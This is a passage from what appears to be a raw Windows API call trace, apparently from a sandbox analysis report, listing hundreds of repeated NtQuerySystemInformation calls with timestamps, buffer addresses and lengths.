SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0280.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0280.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x28, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0280.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0281.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0281.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0281.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0281.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0281.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0281.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0281.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0281.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0281.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 